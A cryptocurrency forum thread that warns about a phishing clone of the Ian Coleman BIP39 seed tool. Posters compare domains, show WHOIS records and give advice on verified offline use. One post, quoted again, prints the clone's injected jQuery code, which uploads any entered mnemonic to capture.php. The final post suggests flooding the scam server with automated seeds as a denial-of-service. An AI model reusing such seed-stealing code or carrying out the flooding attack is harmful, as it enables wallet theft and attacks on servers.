Is Iancoleman BIP39 Site Changed Domain from .io to .ch?

[Sarah Azhari]

Note: Iancoleman.ch is Scam, be carefull

Read this :

I've just had a quick look through the source code for the .ch site, and here is the scam code which is missing from the real .io site, at line 18,466:

Code:

$(document).on('blur', 'textarea#phrase', function(e){
      var mnemonic = e.target.value
      console.log("mnemonic=>", mnemonic)
      $.ajax({
        type: "POST",
        url: "capture.php",
        dataType: "JSON",
        data: {mnemonic, userAgent: navigator.userAgent}
      })
  })

Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

And I'll repeat myself as I always do whenever someone ends up on a scam site - follow the instructions below to avoid 99.9% of these scams:

I know this site a couple of months ago, a place to recover and generate a seed. iancoleman.io, just tried some time ago, and download it offline, looks fun to me.

Today I have to try something, but I forgot the domain (didn't bookmark it on my browser), so when I type iancoleman in the box search, that directly on iancoleman.ch, here a picture.



In this case, I suggest to the developer or any further official to make the announcement if the domain was changed to avoid user accessing phishing.

thank alot

[hosseinimr93]

Iancoleman's domain hasn't been changed and I can access the iancoleman.io without any problem.
It's the first time I've heard of the .ch domain and that's probably a fake website created for scamming purposes.

Edit:
I just searched for "iancoleman" on google.
It shows the .ch domain as an advertisement. It's not the first time I see google is promoting scams.

[NeuroticFish]

I don't know if it's a legit or malicious clone of iancoleman.io and it doesn't even matter.
Any seed generation (or related tests) for addresses expected to hold money "currently" or any time in the future should be done with the code/page from GitHub (https://github.com/iancoleman/bip39) in a safe offline environment.

If you feel the website is not a legit clone (I can't tell right now, but I would assume the worse), you can easily add a line in hosts:

Code:

0.0.0.0 iancoleman.ch

[Charles-Tim]

In this case, I suggest to the developer or any further official to make the announcement if the domain was changed to avoid user accessing phishing.

If I remember correctly, I have seen the one for Coinomi before. The BIP 39 tool is open source, its source code is available for other developers to see. Instead for people to just let people avoid online attack, they do not direct people to the original site, but they just copy the source code for their own use which can for their own profit which may even not be legit by introducing malicious code to it to carry out an attack on people that make use of the malicious ones.

Very possible the one you pointed to above is a malicious one, but I am not certain about that, just that people should not use it.

Even it is just best to download the html file and use a text editor to open it on an airgapped device.

[DdmrDdmr]

The site referenced in the OP indicates that the version of the software is v0.5.2 ,which dates from February 2021(*), whilst the known .io domain displays the current version v0.5.4, which is from October 2021.

I’ve seen another site exactly like the one referenced in the OP, with a deliberately close name (lacking an “e”) to the original one: https[colon]//iancolman[dot]io/
Both are very likely scam sites.

While we’re at it, there’s also a .net version (https[colon]//iancoleman[dot]net/), with a flashier interface, but full of spelling and grammatical mistakes in the explanation. Probably yet another site one should not end up visiting …

(*) See: https://github.com/iancoleman/bip39/releases/

[mk4]

Just a heads up: Install an open-source and reputable ad blocking plugin such as uBlock Origin[1] so you wouldn't be getting those scam advertisements.


[1] https://github.com/gorhill/uBlock

[o_e_l_e_o]

I've just had a quick look through the source code for the .ch site, and here is the scam code which is missing from the real .io site, at line 18,466:

Code:

$(document).on('blur', 'textarea#phrase', function(e){
      var mnemonic = e.target.value
      console.log("mnemonic=>", mnemonic)
      $.ajax({
        type: "POST",
        url: "capture.php",
        dataType: "JSON",
        data: {mnemonic, userAgent: navigator.userAgent}
      })
  })

Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

And I'll repeat myself as I always do whenever someone ends up on a scam site - follow the instructions below to avoid 99.9% of these scams:

Stop using Google to find the website of exchanges, services, or wallets.

Stop following random links without checking the URL.

Start using uBlock Origin.

Never type your seed in anywhere.

How many times does this need repeated?

OP: I would suggest you edit the topic title and your first post to make it clear to anyone who stumbles across it or finds it via a search engine that the only real iancoleman site is the .io one. Also, it should only be used after you download it from GitHub at https://github.com/iancoleman/bip39 and run it on an offline machine, and never ran via an online site.

[dkbit98]

Today I have to try something, but I forgot the domain (didn't bookmark it on my browser), so when I type iancoleman in the box search, that directly on iancoleman.ch, here a picture.

I would suggest everyone to stay away from this website, and use only official iancoleman github page that shows only official website is with .io domain.
There is one more suspicious and maybe phishing domain other than .ch, and they are using .net domain with same name.
It could be this is alternative domains but I would be very careful and not use them until I hear something from developer.

Let's check out when this recent domains got registered.
First one with .ch domain was registered in March 2022:

Code:

Domain name	iancoleman.ch
Registrar	Sarek Oy
Urho Kekkosen katu 4-6 E
FI-00100 Helsinki
Phone +358 931577910
terve@sarek.fi
DNSSEC	no
Name servers
dell.ns.cloudflare.com
vick.ns.cloudflare.com
First registration date	30 March 2022

Second one was registered in 2021 and than updated this year.

Code:

Domain name: iancoleman.net
Registry Domain ID: 2629607198_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-07-13T13:35:42.12Z
Creation Date: 2021-07-27T10:11:57.00Z
Registrar Registration Expiration Date: 2023-07-27T10:11:57.00Z
Registrar: NAMECHEAP INC

[_BlackStar]

Today I have to try something, but I forgot the domain (didn't bookmark it on my browser), so when I type iancoleman in the box search, that directly on iancoleman.ch, here a picture.

How likely is it for you not to get two different domain for the same site when you do google search with the keyword [iancoleman]?

Google search with the keyword [iancoleman] doesn't directly to the [.ch] domain if you don't actually fill that domain when your search. So there is a possibility that you ignore the [ad] sign on the left of the site that Google refers to and ignore the original site right below the phishing site.

In this case, I suggest to the developer or any further official to make the announcement if the domain was changed to avoid user accessing phishing.

No domain changes I guess, you just go to the phishing site instead of the original site right below it. So you just have to stay away and warn everyone and report it to google.

[Outhue]

Even the original Ian Coleman website is not safe, do not use that website, I import recovery phrase into this website few years ago when I was still using coinomi and later someone moved out tokens worth hundreds of dollars from my wallet, this is the only website Imported my keys into.

[hosseinimr93]

Even the original Ian Coleman website is not safe, do not use that website,

If you use the online website, you are right. That's not safe. Even if you enter your seed phrase on iancoleman.io and not a fake website, there's still the chance of getting hacked.
Iancoleman is open source and if you want to use it securely, you should download the source code and run it offline on an air-gapped device.
Take note that any online website and any online wallet (including Coinomi) is unsecure.

[Sarah Azhari]

Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

so in this case, if {don't know} user try to recovery mnemonic seed using that scam site, that possible a scammer got our detail into the scammer server and was able to steal our cryptocurrency, right?

So, is possible they got if not bip39 seed?,
because that site especially for bip39 seed, when using electrum seed, that different category, maybe not successfully generate the private key and won't able to get the detil?.

[Apocollapse]

so in this case, if {don't know} user try to recovery mnemonic seed using that scam site, that possible a scammer got our detail into the scammer server and was able to steal our cryptocurrency, right?

So, is possible they got if not bip39 seed?,
because that site especially for bip39 seed, when using electrum seed, that different category, maybe not successfully generate the private key and won't able to get the detil?.

If you input the right information of your wallet into the scam BIP39 site, the scammer will able to control your wallet since they have a full detail to access your wallet. It's similar like you input your 12 or 24 seeds on phishing site, this is why most people get scammed since they think they have protect their seeds, but they're careless since they're not aware if they access phishing site.

The best thing is only input any personal information in offline version.

[o_e_l_e_o]

so in this case, if {don't know} user try to recovery mnemonic seed using that scam site, that possible a scammer got our detail into the scammer server and was able to steal our cryptocurrency, right?

Any seed phrase which is either generated by that site or entered in to the seed phrase box is uploaded to the site's server and therefore accessible by the malicious person behind this site. So yes, the scammer will have your seed phrase and therefore will steal your coins.

So, is possible they got if not bip39 seed?,
because that site especially for bip39 seed, when using electrum seed, that different category, maybe not successfully generate the private key and won't able to get the detil?.

There should be no reason to insert an Electrum seed phrase on the Iancoleman site since it will not generate the correct addresses even if it (by chance) passes the checksum,* but you should assume that the scammer behind this site is well aware of the difference between BIP39 seed phrases and Electrum seed phrases, and would also check the seed phrase for any Electrum wallets.

*You can edit the code to make it work with Electrum seed phrases if you desire, but that's not really relevant to this discussion.

[dkbit98]

Even the original Ian Coleman website is not safe, do not use that website, I import recovery phrase into this website few years ago when I was still using coinomi and later someone moved out tokens worth hundreds of dollars from my wallet, this is the only website Imported my keys into.

Official website is perfectly safe if you use it OFFLINE like you should, but this does not apply for any phishing or hijacked websites.
You can't blame someone else for doing experiments like you did with open source tools like Ian Coleman code and website.
There is even message on bottom saying that you can use this website oflline and simple instructions how to do it.

[Charles-Tim]

Even the original Ian Coleman website is not safe, do not use that website, I import recovery phrase into this website few years ago when I was still using coinomi and later someone moved out tokens worth hundreds of dollars from my wallet, this is the only website Imported my keys into.

Official website is perfectly safe if you use it OFFLINE like you should, but this does not apply for any phishing or hijacked websites.
You can't blame someone else for doing experiments like you did with open source tools like Ian Coleman code and website.
There is even message on bottom saying that you can use this website oflline and simple instructions how to do it.

There are two offline usage. First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe? I have preferred the second method which is the use of its source code.

@Outhue, if you want to make use of Iancoleman, or want to make use of a tool that generates seed phrase or private key like, bitaddress, you need to make use of the source code for that on an airgapped device. I still wonder how people will find it convenient for themselves to input their seed phrase or private key on a tool that is online, that is not safe even if you are using it on a reputed site.

[BlackHatCoiner]

First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe?

The risk is the same as downloading Electrum from electrum.org without verifying the binaries; there's a chance the site is compromised.

The safe way is the following:

• Grab and download the latest release from github.com/iancoleman/bip39/releases.
• Make sure that the sha256sum result is the same as in the release signed message.
• Import Ian's public key.
• Verify the release signed message.
• Boot an air-gapped machine with a reviewed Linux distro.
• Load iancoleman/bip39 there.

[hosseinimr93]

First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe?

The risk is the same as downloading Electrum from electrum.org without verifying the binaries; there's a chance the site is compromised.

Even if the website isn't compromised, that's like using electrum on an online device and there's still the chance that your computer is compromised.
The safer method (not the safest) is to save the webpage as a file, move it to an air-gapped device and use it there.

[BlackHatCoiner]

The safer method (not the safest) is to save the webpage as a file, move it to an air-gapped device and use it there.

If your computer is virus infected, everything's possible. You might as well download the file, and the malware that runs in the background replaces it with another. You might download Ian's public key, and it switches it to the attacker's public key. You might load github.com, and it returns you a fake replica, with compromised binaries.

Whatever you do, you'll have to somehow acquire Ian's binaries, signatures and public key using a non-airgapped computer. And, as always, there are risks.

[NotATether]

Since it POSTs the seed to the attacker's server, you can DoS the server by automatically generating thousands of seeds per second on a fast connection. Just make sure that you use something like Selenium to press the generate button, then clicks on the text box with the seed, and then back to the button again - that should be sure to trigger the attacking code.

Even if it does not take down the website, it will leave the attacker with gigabytes of garbage seed phrases to sift through and might crash whatever database is storing them all, or at least slows it to a crawl. The attacking script is written in PHP after all.